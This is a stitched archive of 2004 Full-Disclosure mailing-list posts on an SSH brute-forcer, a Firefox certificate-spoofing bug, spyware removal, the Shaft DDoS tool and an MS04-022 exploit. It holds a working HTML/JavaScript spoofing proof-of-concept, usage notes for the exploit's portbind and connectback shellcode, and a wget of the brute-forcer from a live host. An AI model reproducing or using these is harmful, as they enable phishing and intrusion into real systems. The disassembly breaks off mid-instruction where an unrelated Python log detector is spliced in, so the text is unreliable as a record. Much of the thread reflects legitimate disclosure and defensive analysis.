Re: [Full-Disclosure] Automated SSH login attempts?

2004-07-31 Thread Jan Muenther
Hi there,

> Agreed. The thing *is* publicly available, just do 'wget
> frauder.us/linux/ssh.tgz'. What kept me from disassembling the thing so
> far is not availability, but lacking knowledge about the ssh protocol on
> my side ;-)

Hm, actually, there's fairly little of that required to see what this beast 
does...  
Guys, I can't help but sing the praise of IDA Pro. Get it, it's worth the 
money. 

> The tool itself dos not need root rights. What needs to be root is the
> portscanner accompanying it.

Yeah, found that too. That, however, is not surprising. It's a SYN scanner,
using a detached scanning method, built on libnet (eh, too lazy for raw sockets,
are we) and libpcap, and it's statically linked against them. Both binaries
were not stripped, by the way :>

You'll need root rights for constructing packets with libnet and root rights
to set the interface into promiscuous mode for the pcap captures. 

> 
> hehe. According to a brief look at the strace of this thingy, it does
> not do anything suspicious on the local box. But maybe I should have a
> second look - who knows? 

Mkay, it really appears to be just an SSH scanner / bruteforcer, which next 
to the hardcoded username / password combinations also tries the identity / 
public key files of the current user to access other boxes. 

Some stuff from the disassembly (label names are mine, function names are from
the binary, as I said, not stripped). 

So, it first tries to open uniq.txt for its input, nothing new, and bails out
if it can't:

.text:080482E3 push    offset aR        ; "r"
.text:080482E8 push    offset aUniq_txt ; "uniq.txt"
.text:080482ED call    fopen
.text:080482F2 add     esp, 10h
.text:080482F5 mov     [ebp+var_C], eax
.text:080482F8 cmp     [ebp+var_C], 0
.text:080482FC jnz     short loc_8048314
.text:080482FE sub     esp, 0Ch
.text:08048301 push    offset aNuPotDeschideU ; "nu pot deschide uniq.txt\n"
.text:08048306 call    printf

Is this Romanian? Seen it a lot recently...

.text:0804835B do_it:                  ; CODE XREF: main+86↑j
.text:0804835B call    fork
.text:08048360 test    eax, eax
.text:08048362 jnz     short loc_80483A6
.text:08048364 sub     esp, 4
.text:08048367 lea     eax, [ebp+var_418]
.text:0804836D push    eax
.text:0804836E push    offset aTest    ; "test"
.text:08048373 push    offset aTest    ; "test"
.text:08048378 call    ccheckauth
.text:0804837D add     esp, 10h
.text:08048380 sub     esp, 4
.text:08048383 lea     eax, [ebp+var_418]
.text:08048389 push    eax
.text:0804838A push    offset aGuest   ; "guest"
.text:0804838F push    offset aGuest   ; "guest"
.text:08048394 call    ccheckauth
.text:08048399 add     esp, 10h
.text:0804839C sub     esp, 0Ch
.text:0804839F push    0
.text:080483A1 call    exit

Mkay, so, it forks and calls a function called ccheckauth(), giving test and
guest as parameters for the username and password variables of that function. 
Once that's done, it exits. 


So, here's that function:

.text:080481E8 public ccheckauth
.text:080481E8 ccheckauth  proc near   ; CODE XREF: main+AB↓p
.text:080481E8                         ; main+C7↓p
.text:080481E8
.text:080481E8 var_14  = dword ptr -14h
.text:080481E8 var_10  = dword ptr -10h
.text:080481E8 var_C   = dword ptr -0Ch
.text:080481E8 var_8   = dword ptr -8
.text:080481E8 var_4   = dword ptr -4
.text:080481E8 arg_0   = dword ptr  8
.text:080481E8 arg_4   = dword ptr  0Ch
.text:080481E8 arg_8   = dword ptr  10h
.text:080481E8
.text:080481E8 push    ebp
.text:080481E9 mov     ebp, esp
.text:080481EB sub     esp, 18h
.text:080481EE mov     [ebp+var_C], 1
.text:080481F5 mov     [ebp+var_10], offset aNone ; "none"
.text:080481FC sub     esp, 0Ch
.text:080481FF push    0Fh
.text:08048201 call    alarm
.text:08048206 add     esp, 10h
.text:08048209 sub     esp, 8
.text:0804820C lea     eax, [ebp+var_10]
.text:0804820F push    eax
.text:08048210 lea     eax, [ebp+var_C]
.text:08048213 push    eax
.text:08048214 call    ssh_getopt
.text:08048219 add     esp, 10h
.text:0804821C mov
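A defender-side companion to the analysis above, added here and not part of the original thread: it parses constructed sshd syslog lines and flags sources that try the scanner's hardcoded test/guest usernames, or that rack up repeated failures. Host names, addresses and log lines are all made up.

```python
import re
from collections import defaultdict
from datetime import datetime

# Usernames the scanner's ccheckauth() calls try (test/test, guest/guest),
# as read off the disassembly in the thread. Any failed login against
# these is a strong hint of the same kind of automated tool.
SCANNER_USERS = {"test", "guest"}

# Constructed sample of OpenSSH syslog lines (not a real capture). The
# "illegal user" wording is what sshd of that era logged; newer releases
# log "invalid user", so both are accepted by the regex below.
SAMPLE_LOG = """\
Jul 31 03:12:01 bastion sshd[4410]: Illegal user test from 192.0.2.10
Jul 31 03:12:01 bastion sshd[4410]: Failed password for illegal user test from 192.0.2.10 port 3301 ssh2
Jul 31 03:12:03 bastion sshd[4412]: Illegal user guest from 192.0.2.10
Jul 31 03:12:03 bastion sshd[4412]: Failed password for illegal user guest from 192.0.2.10 port 3302 ssh2
Jul 31 03:12:04 bastion sshd[4413]: Failed password for root from 192.0.2.10 port 3303 ssh2
Jul 31 03:15:22 bastion sshd[4420]: Failed password for invalid user test from 198.51.100.7 port 51022 ssh2
Jul 31 03:15:25 bastion sshd[4421]: Accepted publickey for alice from 203.0.113.5 port 40022 ssh2
Jul 31 03:20:00 bastion sshd[4430]: Failed password for alice from 203.0.113.5 port 40023 ssh2
"""

FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?P<inv>(?:illegal|invalid) user )?"
    r"(?P<user>\S+) from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_line(line):
    """Return {ts, user, src, invalid} for a failed-password line, else None."""
    m = FAILED_RE.search(line)
    if not m:
        return None
    mon, day, hms = line.split()[:3]          # syslog timestamp has no year
    ts = datetime.strptime(f"{mon} {day} {hms}", "%b %d %H:%M:%S")
    return {"ts": ts, "user": m.group("user"), "src": m.group("src"),
            "invalid": m.group("inv") is not None}


def summarize(log_text, threshold=3):
    """Group failures per source IP and classify each source.

    scanner-dictionary: tried one of the tool's hardcoded usernames
    brute-force:        >= threshold failures, whatever the usernames
    benign-noise:       everything else (a user fumbling a password)
    """
    per_src = defaultdict(lambda: {"failures": 0, "users": set(),
                                   "first": None, "last": None})
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        rec = per_src[ev["src"]]
        rec["failures"] += 1
        rec["users"].add(ev["user"])
        if rec["first"] is None or ev["ts"] < rec["first"]:
            rec["first"] = ev["ts"]
        if rec["last"] is None or ev["ts"] > rec["last"]:
            rec["last"] = ev["ts"]

    verdicts = {}
    for src, rec in per_src.items():
        hits = rec["users"] & SCANNER_USERS
        if hits:
            verdict = "scanner-dictionary"
        elif rec["failures"] >= threshold:
            verdict = "brute-force"
        else:
            verdict = "benign-noise"
        verdicts[src] = {
            "verdict": verdict,
            "failures": rec["failures"],
            "users": sorted(rec["users"]),
            "dictionary_hits": sorted(hits),
            "span_s": (rec["last"] - rec["first"]).total_seconds(),
        }
    return verdicts


def sources_to_block(verdicts):
    """Sorted list of sources whose verdict is not benign."""
    return sorted(s for s, v in verdicts.items() if v["verdict"] != "benign-noise")


if __name__ == "__main__":
    for src, v in summarize(SAMPLE_LOG).items():
        print(f"{src:15} {v['verdict']:19} failures={v['failures']} "
              f"users={v['users']} span={v['span_s']:.0f}s")
    print("block:", sources_to_block(summarize(SAMPLE_LOG)))
```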

Re: [Full-Disclosure] Automated SSH login attempts?

2004-07-31 Thread Jan Muenther
Hey Valdis,

> It's more likely that there's one version, making noise and very rarely finding
> a box with stupid passwords.  It's possible there's another rare version that
> tries several stupid passwords and a few old SSH vulnerabilities.  Is there
> *any* reliable evidence (even a single box) that appears to have been nailed by
> a new exploit?

Hm, as for this frauder binary, I have my strong doubts... looked at it, and
it's a plain brute forcer / banner grabber which is statically linked against
SSH-2.0-libssh-0.1. No magic visible, at least not in the given timeframe, and
my gut feeling is that that's it.

> 
> I'll gladly change my mind, but it will take somebody actually finding a
> box running a *recent* SSH and had guest/test/and_so_on properly secured,
> and the attack *still* got in

I assume in the aforementioned takeovers other factors were involved. 

Cheers, J.


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

2004-07-31 Thread Peter Besenbruch
Stephen Samuel wrote:
> Has this been posted to Bugzilla?
>
>
> E.Kellinis wrote:
>
>> #
>> Application:  Mozilla Firefox
>> Vendors:      http://www.mozilla.com
>> Version:      0.9.1 / 0.9.2
>> Platforms:    Windows
>> Bug:          Certificate Spoofing (Phishing)
>> Risk:         High
>> Exploitation: Remote with browser
>> Date:         25 July 2004
>> Author:       Emmanouel Kellinis
>> e-mail:       [EMAIL PROTECTED](dot)org(dot)uk
>> web:          http://www.cipher.org.uk
>> List:         BugTraq (SecurityFocus) / Full-Disclosure
>> #
This was fixed by the July 27 builds in both Firefox 0.9.2 (or 1) and
Mozilla 1.7. The Mozilla 1.4 branch was also updated.

Bugzilla report:
http://bugzilla.mozilla.org/show_bug.cgi?id=253121

Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky


Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

2004-07-31 Thread Will Beers
I got this working on both windows and linux versions of firefox and 
mozilla, it's been submitted and patched.

http://bugzilla.mozilla.org/show_bug.cgi?id=253121
Will Beers
Juan Carlos Navea wrote:
> Has anyone tried the proof of concept with a real SSL cert and got it working?
>
> I just tried it using two different SSL URLs and the page only
> redirected me to the proper site. I did not see the output generated
> by document.writeln even after viewing the source.
> Can anyone confirm this? I haven't seen any mention of it on Bugzilla either.
>
> I'm using:
>
> 0.9.2 on Windows2k
>
> On Fri, 30 Jul 2004 20:16:12 -0700, Stephen Samuel <[EMAIL PROTECTED]> wrote:
> > Has this been posted to Bugzilla?
> > E.Kellinis wrote:
> > > [...]






RE: [Full-Disclosure] FullDisclosure: CWS removal tools

2004-07-31 Thread Todd Towles
Randall, we have discussed CWShredder. The author stopped supporting his
program and did have a list of every variant on this website and the methods
it used. Very tricky.

He also points out it will not stop the newest version because of the
advanced survival techniques being employed. They are starting to use
rootkit-like methods to hide and rebuild if damaged. CWShredder won't get
the new version and neither will any new program.

As far as malware goes, there is a lot of malware around that is never detected
by AV or anti-spyware software or anything else for that matter.

Sometimes humans are the best countermeasure.

Todd

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of RandallM
Sent: Saturday, July 31, 2004 9:30 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] FullDisclosure: CWS removal tools

[...]



Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

2004-07-31 Thread Aviv Raff
> Has anyone tried the proof of concept with a real ssl cert and get it working? 

Yep. 
Try here: http://avivra.europe.webmatrixhosting.net/moz/certspoof1.html

> I just tried it using two different ssl urls and the page only redirected me to the 
> proper site. I did not see the output generated by document.writeln even after 
> viewing the source.

It works just fine with paypal.

> Can anyone confirm this? 

Confirmed. Using Firefox 0.9.2 on XP and Win2k3.

> I haven't seen any mention of it on bugzilla either.

It's probably checked as a security issue, therefore it's not public.



[Full-Disclosure] Cool Web Search Michael: take up the slack!

2004-07-31 Thread RandallM
Michael,
Very interesting that you would say you'd like to do battle. The below link
is a cached page of the author of
CWShredder/HijackThis who states on his web page (I could only get the
cached version
http://64.233.167.104/search?sourceid=navclient-menuext
 &q=cache:http%3A//www.spywareinfo.com/~merijn/
Home page unreachable at the moment:
http://www.spywareinfo.com/~merijn/index.html):
 
>>>
June 28, 2004:Alright, this will be my last update for a while. I have a lot
of things going on that are not spyware-related in the next few months and
frankly I find these more important than the spyware-related issues. I'm
sorry if that offends you, but I simply don't have the time to do both at
the same time. I hope you'll understand. 

July 1 2004, I will be graduating from the University of Utrecht and receive
my Masters Degree in Science (chemistry, specifically). 
September 1 2004, I will start a second study at the same university. I'm
not sure what the English name for this study is (in Dutch it's
Informatiekunde) but it's in the Computer Sciences field. 

Right now, my email inbox is overflowing with over 2700 emails which I can't
possibly answer all. These 2700 are two-thirds of about 4000, the remaining
one-third being spam and email viruses which I've already deleted. (For
god's sake people, get some decent antivirus protection, that's nearly 1300
emails from Windows systems infected with email spewing trojans.) 
>>
 
I'm sure he would have variants and stuff to help you get started.

--__--__--

Message: 34
From: "Schmidt, Michael R." <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Cool Web Search
Date: Fri, 30 Jul 2004 14:10:30 -0700

I will take up arms to write a cleaner for it. I despise programs like this.

Since we are talking about 30 variations does anyone know where a person can
get archived versions of all of these?

I've got a machine and the tools and know how to build the tool. I just need
to be "infected" - wow, 30 variants. That is truly ugly.

Thanks

Michael R. Schmidt

- - - -
thank you
Randall M
 
 



Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

2004-07-31 Thread Juan Carlos Navea
Has anyone tried the proof of concept with a real SSL cert and got it working?

I just tried it using two different SSL URLs and the page only
redirected me to the proper site. I did not see the output generated
by document.writeln even after viewing the source.

Can anyone confirm this? I haven't seen any mention of it on Bugzilla either.

I'm using:

0.9.2 on Windows2k


On Fri, 30 Jul 2004 20:16:12 -0700, Stephen Samuel <[EMAIL PROTECTED]> wrote:
> Has this been posted to Bugzilla?
> 
> E.Kellinis wrote:
> > [...]


-- 
http://scott.telnetd.com/loco/



[Full-Disclosure] FullDisclosure: CWS removal tools

2004-07-31 Thread RandallM
I haven't seen all the threads on this but there is a tool called
CWShredder. It was created to combat CWS. Unfortunately,
the author was a student and it seems he can no longer support it. I just
attempted to find it somewhere else because his links seem down.
At work I use it all the time to clean the computers. Worked wonders. Guess
I'll cherish my tool until it becomes obsolete.
I found one link that still works but not sure if it updates anymore:
http://www.aluriasoftware.com/tools/cwshredder.zip . Here
are some other useful links: http://www.safer-networking.org/minifiles.html
 
thank you
Randall M
 
 



RE: [Full-Disclosure] [Paper] Designing secure desktop operating system

2004-07-31 Thread Todd Towles
Fedora Core 2 from Red Hat is free and includes SELinux. Anyone been using
the test release of FC3?

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Timo Sirainen
Sent: Saturday, July 31, 2004 4:16 AM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: [Full-Disclosure] [Paper] Designing secure desktop operating system

[...]




Re: [Full-Disclosure] Security Web Site Hosting

2004-07-31 Thread CrYpTiC MauleR

- Original Message -
From: [EMAIL PROTECTED] (Simon Richter)
Date: Fri, 30 Jul 2004 23:23:08 +0200
To: n30 <[EMAIL PROTECTED]>
Subject: Re: [Full-Disclosure] Security Web Site Hosting

> Hi,
> 
> > Any recommendations on site hosting services / Portal frameworks / site
> > builders...
> 
> I've heard PHPNuke is pretty solid.
> 
>Simon
> 
> -- 
> GPG Fingerprint: 040E B5F7 84F1 4FBC CEAD  ADC6 18A0 CC8D 5706 A4B4
> 



PHP-Nuke? That is as bad as using IIS. PHP-Nuke has so many XSS, SQL injection etc.
vulns found all the time. Unless you want your site hacked, don't use that. If at all
settling for a 'nuke' CMS, use Post-Nuke or CPG-Nuke.


Regards,
CM
-- 



[Full-Disclosure] Re: Appliance-based security gateway?

2004-07-31 Thread Eric Scher



A few colleagues and I started a discussion as to why 
one should or shouldn't buy an appliance-based firewall, 
ids/ips or other security appliance instead of installing 
software on a server. 

We thought about patching, performance, and other 
reason for each option but I'd like to hear what other 
people think.

I would really appreciate if you could share your 
thoughts with me.

Thanks in advance,

Bernardo Santos Wernesback

===


Ultimately, anything you place at the edge is going to be an appliance.
Maybe it'll be something by Cisco, perhaps a decommissioned desktop
running iptables, or even one of those fancy new boxes that's supposed
to make life easy for inexperienced admins. It's still essentially an appliance.

But what to use?  That's really the essence of the question.

I saw a car show many years ago that was doing a segment on waxing,
and the host asked his guest what he recommends.
The guest replied: "Whatever you're actually going to use."
The best wax in the world won't protect your car if it sits on the shelf.
The worst wax WILL protect your car, if it's actually ON the car.

So for those admins that feel comfortable with something that requires a lot of
interaction, and have the time for it, one of the more user-intensive and complex
choices would be better.

If not, get something that will make your life easier, because a security solution only
secures you when it's being used.




Re: [Full-Disclosure] Shaft DDOS

2004-07-31 Thread mohr
If you're gonna distribute source code, please ensure that it will compile
with a modern compiler!!

I understand that this may have been posted as a historical document (it 
is dated from 2000), but really.

My amateurish C isn't advanced enough to fix everything in shaftnode, but 
I did try to fix up genstuff & shaftmaster as best I could, and added a 
makefile.

On Thu, 29 Jul 2004 [EMAIL PROTECTED] wrote:
> Shaft Denial of Service TOOL
> -japboy


Shaft-DDOS.tar.gz
Description: Shaft-DDOS - fixed?


[Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

2004-07-31 Thread Stephen Samuel
Has this been posted to Bugzilla?
E.Kellinis wrote:
#
Application:  Mozilla Firefox
Vendors:      http://www.mozilla.com
Version:      0.9.1 / 0.9.2
Platforms:    Windows
Bug:          Certificate Spoofing (Phishing)
Risk:         High
Exploitation: Remote with browser
Date:         25 July 2004
Author:       Emmanouel Kellinis
e-mail:       [EMAIL PROTECTED](dot)org(dot)uk
web:          http://www.cipher.org.uk
List:         BugTraq (SecurityFocus) / Full-Disclosure
#
===
Product
===
A popular Web browser, a good alternative to IE and
"The web browser" for Linux machines,
used to view pages on the World Wide Web.

===
Bug
===
Firefox has a caching problem; as a result of that someone can
spoof a certificate of any website and use it as his/her own.
The problem is exploited using onunload inside <body> and
redirection using an Http-equiv Refresh metatag, document.write()
and document.close().

First you direct the redirection metatag to the website
of which you want to spoof the certificate, then inside
the <body> tag you add an onunload script so you can control
the output inside the webpage with the spoofed certificate.

After that you say to Firefox, as soon as you unload this page
close the stream; apparently the stream you close is
the redirection website, you do that with
document.close().

Now you can write anything you want, you do that
using document.write(). After writing the content of your choice
you close the stream again; usually Firefox won't display your content,
although if you check the source code you see it, so the last thing
is to refresh the new page (do that using window.location.reload()),
after that you have your domain name in the url field, your content
in the browser and the magic yellow Lock on the bottom left corner;
if you pass your mouse over it you will see displayed the name of
the website whose certificate you spoofed; if you double click on it you
can check the full information of the certificate without any warning!

You don't need to have SSL in your website! It will work with
http.

Additionally, using this bug malicious websites can bypass content
filtering using SSL properties.

=
Proof Of Concept Code
=
<HTML>
<HEAD>
<TITLE>Spoofer</TITLE>
<META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com">
</HEAD>
<BODY
onunload="
document.close();
document.writeln('<body onload=document.close();break;><h3>It is Great to Use example\'s Cert!');
document.close();
window.location.reload();
">
</body>
=
*PK:http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt
=

--
Stephen Samuel +1(604)876-0426[EMAIL PROTECTED]
   http://www.bcgreen.com/~samuel/
   Powerful committed communication. Transformation touching
 the jewel within each person and bringing it to light.


[Full-Disclosure] [Paper] Designing secure desktop operating system

2004-07-31 Thread Timo Sirainen
[possibly somewhat off-topic here, [EMAIL PROTECTED] can be used
for discussion about it]

I've written down some ideas on how I think it would be possible to
implement an easy-to-use and quite secure graphical user interface and
an operating system around it to make it possible. It's available at
http://iki.fi/tss/security/os.html

Currently I'd be very interested in hearing comments on why my ideas
simply wouldn't work with certain kinds of software or would be just too
much pain. Or some other fundamental technical problem why this could
never work. Or more positively, people who would be willing to
participate in a more complete design or implementation.

To avoid too many replies for issues that are either addressed there or
aren't exactly relevant, please don't reply if you're only going to:

 - suggest using SELinux, Java sandboxes or similar (yes, maybe based on
them, that's not the point)
 - say how sandboxing limits usability and it would never be user-
friendly (it could)
 - say how user-friendliness and security are always mutually exclusive
(they're not)
 - say how it's going to be too difficult for users to keep updating
access control lists to run software they want (it's not needed)
 - confuse operating system with kernel (OS is more than just kernel)
 - say how no matter how "secure" you're trying to be, some people will
always bypass it and hurt themselves/others (yes, it's true for home
users)

I've heard all of those too many times already and I think they're all
answered well enough in the paper.





Re: [Full-Disclosure] Crack Microsoft Office encryption

2004-07-31 Thread Laurent LEVIER
Hi,
At 05:25 31/07/2004, Raj Mathur wrote:
> Anyone have pointers to a free (open source) tool or methodology to
> crack MS Office encrypted files?  Both brute-force and smarter methods
> are fine, smarter preferred, of course :)

I know of no FREE one, but the series from Elcomsoft
(http://www.elcomsoft.com) works pretty well.

Hope this helps
Brgrds
Laurent LEVIER
Systems & Networks Security Expert, CISSP CISM


Re: [Full-Disclosure] Cool Web Search

2004-07-31 Thread Denis McMahon
Dean Porter wrote:
> Has any one dealt with a similar thing called "searchweb2.com"?

Nope, but as a general fallback on Windows systems that have an ebd
that gives a DOS console:

1) identify the elements you need to remove on the live system.
2) boot the ebd and use the ebd tools to remove the unwanted items.
3) reboot without the ebd and check all the stuff you wanted to remove
has gone.

Denis


[Full-Disclosure] (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit

2004-07-31 Thread pigrelax
Hi all!

Microsoft Windows XP Task Scheduler (.job) Universal Exploit

 * Tested on:
 *  - Internet Explorer 6.0 (SP1) (iexplore.exe)
 *  - Explorer (explorer.exe)
 *  - Windows XP SP0, SP1
 *
 * ---
 * Compile:
 *   Win32/VC++  : cl HOD-ms04022-task-expl.c
 *   Win32/cygwin: gcc HOD-ms04022-task-expl.c -lws2_32.lib
 *   Linux       : gcc -o HOD-ms04022-task-expl HOD-ms04022-task-expl.c
 *
 * ---
 * Command Line Parameters/Arguments:
 *
 *   HOD.exe [connectback IP]
 *
 *   Shellcode:
 *     1 - Portbind shellcode
 *     2 - Connectback shellcode
 *
 * ---
 * Example:
 *
 * C:\>HOD-ms04022-task-expl.exe expl.job 1
 *
 * (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
 *
 * --- Coded by .::[ houseofdabus ]::. ---
 *
 * [*] Shellcode: Portbind, port =
 * [*] Generate file: expl.job
 *
 * C:\>
 *
 * start IE -> C:\
 *
 * C:\>telnet localhost
 * Microsoft Windows XP [Версия 5.1.2600]
 * (С) Корпорация Майкрософт, 1985-2001.
 *
 * C:\Documents and Settings\v.X\Рабочий стол>
 *


http://www.securitylab.ru/46820.html


